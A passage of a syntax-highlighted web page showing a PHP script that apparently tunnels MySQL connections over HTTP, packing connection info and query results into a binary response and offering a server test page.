class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br><span class="line">357</span><br><span class="line">358</span><br><span class="line">359</span><br><span class="line">360</span><br><span class="line">361</span><br><span class="line">362</span><br><span class="line">363</span><br><span class="line">364</span><br><span class="line">365</span><br><span class="line">366</span><br><span class="line">367</span><br><span class="line">368</span><br><span class="line">369</span><br><span class="line">370</span><br><span class="line">371</span><br><span class="line">372</span><br><span class="line">373</span><br><span class="line">374</span><br><span class="line">375</span><br><span class="line">376</span><br><span class="line">377</span><br><span class="line">378</span><br><span class="line">379</span><br><span class="line">380</span><br><span class="line">381</span><br><span class="line">382</span><br><span class="line">383</span><br><span class="line">384</span><br><span class="line">385</span><br><span class="line">386</span><br><span class="line">387</span><br><span class="line">388</span><br><span class="line">389</span><br><span class="line">390</span><br><span class="line">391</span><br><span class="line">392</span><br><span class="line">393</span><br><span class="line">394</span><br><span class="line">395</span><br><span class="line">396</span><br><span class="line">397</span><br><span class="line">398</span><br><span class="line">399</span><br><span class="line">400</span><br><span class="line">401</span><br><span class="line">402</span><br><span class="line">403</span><br><span class="line">404</span><br><span class="line">405</span><br><span class="line">406</span><br><span class="line">407</span><br><span class="line">408</span><br><span class="line">409</span><br><span class="line">410</span><br><span class="line">411</span><br><span class="line">412</span><br><span class="line">413</span><br><span class="line">414</span><br><span class="line">415</span><br><span class="line">416</span><br><span class="line">417</span><br><span class="line">418</span><br><span class="line">419</span><br><span class="line">420</span><br><span class="line">421</span><br><span class="line">422</span><br><span class="line">423</span><br><span class="line">424</span><br><span class="line">425</span><br><span class="line">426</span><br><span class="line">427</span><br><span class="line">428</span><br><span class="line">429</span><br><span class="line">430</span><br><span class="line">431</span><br><span class="line">432</span><br><span class="line">433</span><br><span class="line">434</span><br><span class="line">435</span><br><span class="line">436</span><br><span class="line">437</span><br><span class="line">438</span><br><span class="line">439</span><br><span class="line">440</span><br><span class="line">441</span><br><span class="line">442</span><br><span class="line">443</span><br><span class="line">444</span><br><span class="line">445</span><br><span class="line">446</span><br><span class="line">447</span><br><span class="line">448</span><br><span class="line">449</span><br><span class="line">450</span><br><span class="line">451</span><br><span class="line">452</span><br><span class="line">453</span><br><span class="line">454</span><br><span class="line">455</span><br><span class="line">456</span><br><span class="line">457</span><br><span class="line">458</span><br><span class="line">459</span><br><span class="line">460</span><br><span class="line">461</span><br><span class="line">462</span><br><span class="line">463</span><br><span class="line">464</span><br><span class="line">465</span><br><span class="line">466</span><br><span class="line">467</span><br><span class="line">468</span><br><span class="line">469</span><br><span class="line">470</span><br><span class="line">471</span><br><span class="line">472</span><br><span class="line">473</span><br><span class="line">474</span><br><span class="line">475</span><br><span class="line">476</span><br><span class="line">477</span><br><span class="line">478</span><br><span class="line">479</span><br><span class="line">480</span><br><span class="line">481</span><br><span class="line">482</span><br><span class="line">483</span><br><span class="line">484</span><br><span class="line">485</span><br><span class="line">486</span><br><span class="line">487</span><br><span class="line">488</span><br><span class="line">489</span><br><span class="line">490</span><br><span class="line">491</span><br><span class="line">492</span><br><span class="line">493</span><br><span class="line">494</span><br><span class="line">495</span><br><span class="line">496</span><br><span class="line">497</span><br><span class="line">498</span><br><span class="line">499</span><br><span class="line">500</span><br><span class="line">501</span><br><span class="line">502</span><br><span class="line">503</span><br><span class="line">504</span><br><span class="line">505</span><br><span class="line">506</span><br><span class="line">507</span><br><span class="line">508</span><br><span class="line">509</span><br><span class="line">510</span><br><span class="line">511</span><br><span class="line">512</span><br><span class="line">513</span><br><span class="line">514</span><br><span class="line">515</span><br><span class="line">516</span><br><span class="line">517</span><br><span class="line">518</span><br><span class="line">519</span><br><span class="line">520</span><br><span class="line">521</span><br><span class="line">522</span><br><span class="line">523</span><br><span class="line">524</span><br><span class="line">525</span><br><span class="line">526</span><br><span class="line">527</span><br><span class="line">528</span><br><span class="line">529</span><br><span class="line">530</span><br><span class="line">531</span><br><span class="line">532</span><br><span class="line">533</span><br><span class="line">534</span><br><span class="line">535</span><br><span class="line">536</span><br><span class="line">537</span><br><span class="line">538</span><br><span class="line">539</span><br><span class="line">540</span><br><span class="line">541</span><br><span class="line">542</span><br><span class="line">543</span><br><span class="line">544</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="comment">//version my202</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//set allowTestMenu to false to disable System/Server test page</span></span><br><span class="line"><span class="variable">$allowTestMenu</span> = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$use_mysqli</span> = function_exists(<span class="string">"mysqli_connect"</span>);</span><br><span class="line"></span><br><span class="line">header(<span class="string">"Content-Type: text/plain; charset=x-user-defined"</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">set_time_limit(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">phpversion_int</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">list</span>(<span class="variable">$maVer</span>, <span class="variable">$miVer</span>, <span class="variable">$edVer</span>) = preg_split(<span class="string">"(/|\.|-)"</span>, phpversion());</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$maVer</span>*<span class="number">10000</span> + <span class="variable">$miVer</span>*<span class="number">100</span> + <span class="variable">$edVer</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (phpversion_int() < <span class="number">50300</span>)</span><br><span class="line">{</span><br><span class="line"> set_magic_quotes_runtime(<span class="number">0</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetLongBinary</span>(<span class="params"><span class="variable">$num</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">return</span> pack(<span class="string">"N"</span>,<span class="variable">$num</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetShortBinary</span>(<span class="params"><span class="variable">$num</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">return</span> pack(<span class="string">"n"</span>,<span class="variable">$num</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetDummy</span>(<span class="params"><span class="variable">$count</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$str</span> = <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span><<span class="variable">$count</span>;<span class="variable">$i</span>++)</span><br><span class="line"> <span class="variable">$str</span> .= <span class="string">"\x00"</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$str</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetBlock</span>(<span class="params"><span class="variable">$val</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$len</span> = strlen(<span class="variable">$val</span>);</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$len</span> < <span class="number">254</span> )</span><br><span class="line"> <span class="keyword">return</span> chr(<span class="variable">$len</span>).<span class="variable">$val</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">return</span> <span class="string">"\xFE"</span>.GetLongBinary(<span class="variable">$len</span>).<span class="variable">$val</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoHeader</span>(<span class="params"><span class="variable">$errno</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$str</span> = GetLongBinary(<span class="number">1111</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetShortBinary(<span class="number">202</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$errno</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetDummy(<span class="number">6</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoConnInfo</span>(<span class="params"><span class="variable">$conn</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$GLOBALS</span>[<span class="string">'use_mysqli'</span>]) {</span><br><span class="line"> <span class="variable">$str</span> = GetBlock(mysqli_get_host_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysqli_get_proto_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysqli_get_server_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$str</span> = GetBlock(mysql_get_host_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysql_get_proto_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysql_get_server_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoResultSetHeader</span>(<span class="params"><span class="variable">$errno</span>, <span class="variable">$affectrows</span>, <span class="variable">$insertid</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$str</span> = GetLongBinary(<span class="variable">$errno</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$affectrows</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$insertid</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$numfields</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$numrows</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetDummy(<span class="number">12</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoFieldsHeader</span>(<span class="params"><span class="variable">$res</span>, <span class="variable">$numfields</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$str</span> = <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">for</span>( <span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$numfields</span>; <span class="variable">$i</span>++ ) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$GLOBALS</span>[<span class="string">'use_mysqli'</span>]) {</span><br><span class="line"> <span class="variable">$finfo</span> = mysqli_fetch_field_direct(<span class="variable">$res</span>, <span class="variable">$i</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(<span class="variable">$finfo</span>->name);</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(<span class="variable">$finfo</span>->table);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$type</span> = <span class="variable">$finfo</span>->type;</span><br><span class="line"> <span class="variable">$length</span> = <span class="variable">$finfo</span>->length;</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$type</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$intflag</span> = <span class="variable">$finfo</span>->flags;</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$intflag</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$length</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysql_field_name(<span class="variable">$res</span>, <span class="variable">$i</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysql_field_table(<span class="variable">$res</span>, <span class="variable">$i</span>));</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$type</span> = mysql_field_type(<span class="variable">$res</span>, <span class="variable">$i</span>);</span><br><span class="line"> <span class="variable">$length</span> = mysql_field_len(<span class="variable">$res</span>, <span class="variable">$i</span>);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$type</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"int"</span>:</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$length</span> > <span class="number">11</span> ) <span class="variable">$type</span> = <span class="number">8</span>;</span><br><span class="line"> <span class="keyword">else</span> <span class="variable">$type</span> = <span class="number">3</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"real"</span>:</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$length</span> == <span class="number">12</span> ) <span class="variable">$type</span> = <span class="number">4</span>;</span><br><span class="line"> <span class="keyword">elseif</span>( <span class="variable">$length</span> == <span class="number">22</span> ) <span class="variable">$type</span> = <span class="number">5</span>;</span><br><span class="line"> <span class="keyword">else</span> <span class="variable">$type</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"null"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">6</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"timestamp"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">7</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"date"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">10</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"time"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">11</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"datetime"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">12</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"year"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">13</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"blob"</span>:</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$length</span> > <span class="number">16777215</span> ) <span class="variable">$type</span> = <span class="number">251</span>;</span><br><span class="line"> <span class="keyword">elseif</span>( <span class="variable">$length</span> > <span class="number">65535</span> ) <span class="variable">$type</span> = <span class="number">250</span>;</span><br><span class="line"> <span class="keyword">elseif</span>( <span class="variable">$length</span> > <span class="number">255</span> ) <span class="variable">$type</span> = <span class="number">252</span>;</span><br><span class="line"> <span class="keyword">else</span> <span class="variable">$type</span> = <span class="number">249</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">253</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$type</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$flags</span> = explode( <span class="string">" "</span>, mysql_field_flags ( <span class="variable">$res</span>, <span class="variable">$i</span> ) );</span><br><span class="line"> <span class="variable">$intflag</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"not_null"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"primary_key"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">2</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"unique_key"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">4</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"multiple_key"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">8</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"blob"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">16</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"unsigned"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">32</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"zerofill"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">64</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"binary"</span>, <span class="variable">$flags</span>)) <span class="variable">$intflag</span> += <span class="number">128</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"enum"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">256</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"auto_increment"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">512</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"timestamp"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">1024</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"set"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">2048</span>;</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$intflag</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$length</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoData</span>(<span class="params"><span class="variable">$res</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">for</span>( <span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$numrows</span>; <span class="variable">$i</span>++ ) {</span><br><span class="line"> <span class="variable">$str</span> = <span class="string">""</span>;</span><br><span class="line"> <span class="variable">$row</span> = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$GLOBALS</span>[<span class="string">'use_mysqli'</span>])</span><br><span class="line"> <span class="variable">$row</span> = mysqli_fetch_row( <span class="variable">$res</span> );</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="variable">$row</span> = mysql_fetch_row( <span class="variable">$res</span> );</span><br><span class="line"> <span class="keyword">for</span>( <span class="variable">$j</span> = <span class="number">0</span>; <span class="variable">$j</span> < <span class="variable">$numfields</span>; <span class="variable">$j</span>++ ){</span><br><span class="line"> <span class="keyword">if</span>( is_null(<span class="variable">$row</span>[<span class="variable">$j</span>]) )</span><br><span class="line"> <span class="variable">$str</span> .= <span class="string">"\xFF"</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(<span class="variable">$row</span>[<span class="variable">$j</span>]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">doSystemTest</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">output</span>(<span class="params"><span class="variable">$description</span>, <span class="variable">$succ</span>, <span class="variable">$resStr</span></span>) </span>{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<tr><td class=\"TestDesc\"><span class="subst">$description</span></td><td "</span>;</span><br><span class="line"> <span class="keyword">echo</span> (<span class="variable">$succ</span>)? <span class="string">"class=\"TestSucc\"><span class="subst">$resStr</span>[0]</td></tr>"</span> : <span class="string">"class=\"TestFail\"><span class="subst">$resStr</span>[1]</td></tr>"</span>;</span><br><span class="line"> }</span><br><span class="line"> output(<span class="string">"PHP version >= 4.0.5"</span>, phpversion_int() >= <span class="number">40005</span>, <span class="keyword">array</span>(<span class="string">"Yes"</span>, <span class="string">"No"</span>));</span><br><span class="line"> output(<span class="string">"mysql_connect() available"</span>, function_exists(<span class="string">"mysql_connect"</span>), <span class="keyword">array</span>(<span class="string">"Yes"</span>, <span class="string">"No"</span>));</span><br><span class="line"> output(<span class="string">"mysqli_connect() available"</span>, function_exists(<span class="string">"mysqli_connect"</span>), <span class="keyword">array</span>(<span class="string">"Yes"</span>, <span class="string">"No"</span>));</span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() >= <span class="number">40302</span> && substr(<span class="variable">$_SERVER</span>[<span class="string">"SERVER_SOFTWARE"</span>], <span class="number">0</span>, <span class="number">6</span>) == <span class="string">"Apache"</span> && function_exists(<span class="string">"apache_get_modules"</span>)){</span><br><span class="line"> <span class="keyword">if</span> (in_array(<span class="string">"mod_security2"</span>, apache_get_modules()))</span><br><span class="line"> output(<span class="string">"Mod Security 2 installed"</span>, <span class="literal">false</span>, <span class="keyword">array</span>(<span class="string">"No"</span>, <span class="string">"Yes"</span>));</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">/////////////////////////////////////////////////////////////////////////////</span></span><br><span class="line"><span class="comment">////</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() < <span class="number">40005</span>) {</span><br><span class="line"> EchoHeader(<span class="number">201</span>);</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">"unsupported php version"</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() < <span class="number">40010</span>) {</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$HTTP_POST_VARS</span>;</span><br><span class="line"> <span class="variable">$_POST</span> = &<span class="variable">$HTTP_POST_VARS</span>; </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">"host"</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">"port"</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">"login"</span>])) {</span><br><span class="line"> <span class="variable">$testMenu</span> = <span class="variable">$allowTestMenu</span>;</span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$testMenu</span>){</span><br><span class="line"> EchoHeader(<span class="number">202</span>);</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">"invalid parameters"</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$testMenu</span>){</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$_POST</span>[<span class="string">"encodeBase64"</span>] == <span class="string">'1'</span>) {</span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span><count(<span class="variable">$_POST</span>[<span class="string">"q"</span>]);<span class="variable">$i</span>++)</span><br><span class="line"> <span class="variable">$_POST</span>[<span class="string">"q"</span>][<span class="variable">$i</span>] = base64_decode(<span class="variable">$_POST</span>[<span class="string">"q"</span>][<span class="variable">$i</span>]);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!function_exists(<span class="string">"mysql_connect"</span>) && !function_exists(<span class="string">"mysqli_connect"</span>)) {</span><br><span class="line"> EchoHeader(<span class="number">203</span>);</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">"MySQL not supported on the server"</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$errno_c</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="variable">$hs</span> = <span class="variable">$_POST</span>[<span class="string">"host"</span>];</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$use_mysqli</span>) {</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$_POST</span>[<span class="string">"port"</span>] )</span><br><span class="line"> <span class="variable">$conn</span> = mysqli_connect(<span class="variable">$hs</span>, <span class="variable">$_POST</span>[<span class="string">"login"</span>], <span class="variable">$_POST</span>[<span class="string">"password"</span>], <span class="string">""</span>, <span class="variable">$_POST</span>[<span class="string">"port"</span>]);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="variable">$conn</span> = mysqli_connect(<span class="variable">$hs</span>, <span class="variable">$_POST</span>[<span class="string">"login"</span>], <span class="variable">$_POST</span>[<span class="string">"password"</span>]);</span><br><span class="line"> <span class="variable">$errno_c</span> = mysqli_connect_errno(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno_c</span> > <span class="number">0</span>) {</span><br><span class="line"> EchoHeader(<span class="variable">$errno_c</span>);</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysqli_connect_error(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>((<span class="variable">$errno_c</span> <= <span class="number">0</span>) && ( <span class="variable">$_POST</span>[<span class="string">"db"</span>] != <span class="string">""</span> )) {</span><br><span class="line"> <span class="variable">$res</span> = mysqli_select_db(<span class="variable">$conn</span>, <span class="variable">$_POST</span>[<span class="string">"db"</span>] );</span><br><span class="line"> <span class="variable">$errno_c</span> = mysqli_errno(<span class="variable">$conn</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> EchoHeader(<span class="variable">$errno_c</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno_c</span> > <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysqli_error(<span class="variable">$conn</span>));</span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>] == <span class="string">"C"</span>) {</span><br><span class="line"> EchoConnInfo(<span 